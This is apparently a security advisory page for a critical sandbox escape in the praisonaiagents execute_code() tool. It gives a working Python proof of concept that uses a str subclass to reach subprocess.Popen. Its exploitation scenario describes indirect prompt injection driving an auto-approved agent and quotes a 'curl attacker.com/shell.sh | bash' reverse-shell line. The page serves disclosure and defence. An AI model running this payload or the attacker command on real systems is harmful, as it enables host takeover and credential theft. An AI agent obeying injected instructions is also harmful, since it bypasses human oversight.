CVE-2026-34938: praisonaiagents: sandbox bypass enables full host RCE

GHSA-6vh2-h83c-9294 | Severity: CRITICAL | CISA SSVC: ATTEND
Published April 1, 2026
CISO Take

Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().

What is the risk?

Maximum exploitability: CVSS 10 with network vector, zero privileges, no user interaction, and scope change (C:H/I:H/A:H). The public PoC lowers the exploitation bar to script-kiddie level post-disclosure. PraisonAI is a widely used multi-agent orchestration framework in enterprise AI pipelines, so exposure is broad. Auto-approval defaults dramatically amplify the blast radius: a single indirect prompt injection in a document, email, or web result processed by the agent is sufficient to achieve code execution with no human in the loop.

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| PraisonAI Agents | pip | <= 1.5.89 | 1.5.90 |

11 dependents; 69% patched; ~0d to patch

Do you use PraisonAI Agents? You're affected.

How severe is it?

CVSS 3.1: 10.0 / 10
EPSS: 0.7% chance of exploitation in 30 days (higher than 49% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Moderate
Exploitation Confidence: medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): None
S (Scope): Changed
C (Confidentiality): High
I (Integrity): High
A (Availability): High

What should I do?

6 steps

  1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).

  2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.

  3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.

  4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions.

  5. DETECT: Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.

  6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.

What does CISA's SSVC say?

Decision: Attend
Exploitation: poc
Automatable: Yes
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
  A.6.1.4 - Risk assessment for AI system
  A.6.2.6 - AI system security
NIST AI RMF
  MANAGE-2.2 - Mechanisms exist to sustain deployment of AI with appropriate oversight
  MAP-5.1 - Likelihood and magnitude of each AI risk driver is examined
OWASP LLM Top 10
  LLM02 - Insecure Output Handling
  LLM07 - Insecure Plugin Design
  LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-34938?

Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().

Is CVE-2026-34938 actively exploited?

No confirmed active exploitation of CVE-2026-34938 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34938?

  1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).
  2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.
  3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.
  4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions.
  5. DETECT: Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.
  6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.

What systems are affected by CVE-2026-34938?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines with code execution tools, RAG pipelines with autonomous agents, multi-agent orchestration systems, AI-powered automation bots.

What is the CVSS score for CVE-2026-34938?

CVE-2026-34938 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.71%.

What is the AI security impact?

Affected AI Architectures

agent frameworks
agentic pipelines with code execution tools
RAG pipelines with autonomous agents
multi-agent orchestration systems
AI-powered automation bots

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0105 Escape to Host

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.1.4, A.6.2.6
NIST AI RMF: MANAGE-2.2, MAP-5.1
OWASP LLM Top 10: LLM02, LLM07, LLM08

What are the technical details?

Original Advisory

### Summary

`execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host.

### Details

`python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink)

```python
# source -- _safe_getattr accepts any str subclass
def _safe_getattr(obj, name, *default):
    if isinstance(name, str) and name.startswith('_'):  # isinstance passes for subclasses
        raise AttributeError(...)

# hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword
FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False})

# sink -- Popen reached via __subclasses__ walk
r = Popen(['id'], stdout=PIPE, stderr=PIPE)
```

### PoC

```python
from praisonaiagents.tools.python_tools import execute_code

payload = """
t = type
FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False})
mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_']))
subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_']))
mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_']))
name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_']))
PIPE = -1
obj_class = getattr(type(()), mro_attr)[1]
for cls in getattr(obj_class, subs_attr)():
    try:
        m = getattr(cls, mod_attr, '')
        n = getattr(cls, name_attr, '')
        if m == 'subprocess' and n == 'Popen':
            r = cls(['id'], stdout=PIPE, stderr=PIPE)
            out, err = r.communicate()
            print('RCE:', out.decode())
            break
    except Exception as e:
        print('ERR:', e)
"""
result = execute_code(code=payload)
print(result)
# expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)...
```

### Impact

Any user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.
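To make the root cause concrete, here is an added example (not PraisonAI's code and not the fix shipped in 1.5.90) that puts a guard shaped like the advisory's `_safe_getattr` beside one that does not trust the argument's own methods. The names `guard_vulnerable`, `guard_hardened`, `safe_getattr_hardened` and `LyingStr` are hypothetical; the `str` subclass is built with `type()` exactly as the Details section describes.

```python
# Added example (not PraisonAI's code): the guard shape from the advisory beside
# a guard that never consults the argument's own startswith(). All names hypothetical.

def guard_vulnerable(name):
    """Blocks the name only if the *argument's own* startswith() says so.
    isinstance() accepts str subclasses, so an overridden startswith() wins."""
    return isinstance(name, str) and name.startswith('_')

def guard_hardened(name):
    """Reject anything that is not exactly str, then ask the base class.
    str.startswith(name, '_') is the unbound method: a subclass override is
    never consulted, even if the exact-type check were relaxed later."""
    if type(name) is not str:
        return True
    return str.startswith(name, '_')

def safe_getattr_hardened(obj, name, *default):
    """Same shape as the wrapper in the advisory, using the hardened guard.
    The message deliberately does not format `name`: its __str__ could be
    overridden just like startswith() was."""
    if guard_hardened(name):
        raise AttributeError("private or non-str attribute name blocked")
    return getattr(obj, name, *default)

# Constructed input: a str subclass whose startswith() always answers False,
# built with type() as in the advisory (no class keyword needed).
LyingStr = type('LyingStr', (str,), {'startswith': lambda self, *a: False})

def compare():
    dunder = LyingStr('__subclasses__')
    return {
        'vulnerable_blocks_plain': guard_vulnerable('__subclasses__'),  # True
        'vulnerable_blocks_subclass': guard_vulnerable(dunder),        # False: bypassed
        'hardened_blocks_subclass': guard_hardened(dunder),            # True
        'hardened_blocks_plain': guard_hardened('__mro__'),            # True
        'hardened_allows_public': guard_hardened('upper'),             # False
    }

if __name__ == '__main__':
    for check, outcome in compare().items():
        print(f'{check}: {outcome}')
```

This closes one hop only; the isolation and least-privilege steps in the remediation list remain the controls that contain a bypass of any Python-level sandbox.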

Exploitation Scenario

An attacker embeds a malicious prompt in a publicly accessible document or web page that an autonomous PraisonAI agent crawls as part of its workflow (indirect prompt injection). The injected prompt instructs the agent to call execute_code() with the PoC payload. Because PRAISONAI_AUTO_APPROVE=true is default in autonomy_mode.py, the agent executes the payload silently — no human confirmation dialog appears. The payload walks Python's __subclasses__ chain to reach subprocess.Popen, executes 'curl attacker.com/shell.sh | bash', and establishes a reverse shell. From there, the attacker pivots to any credentials, APIs, or data sources accessible to the agent process.

Weaknesses (CWE)

CWE-693 — Protection Mechanism Failure: The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
April 1, 2026
Last Modified
April 1, 2026
First Seen
April 2, 2026
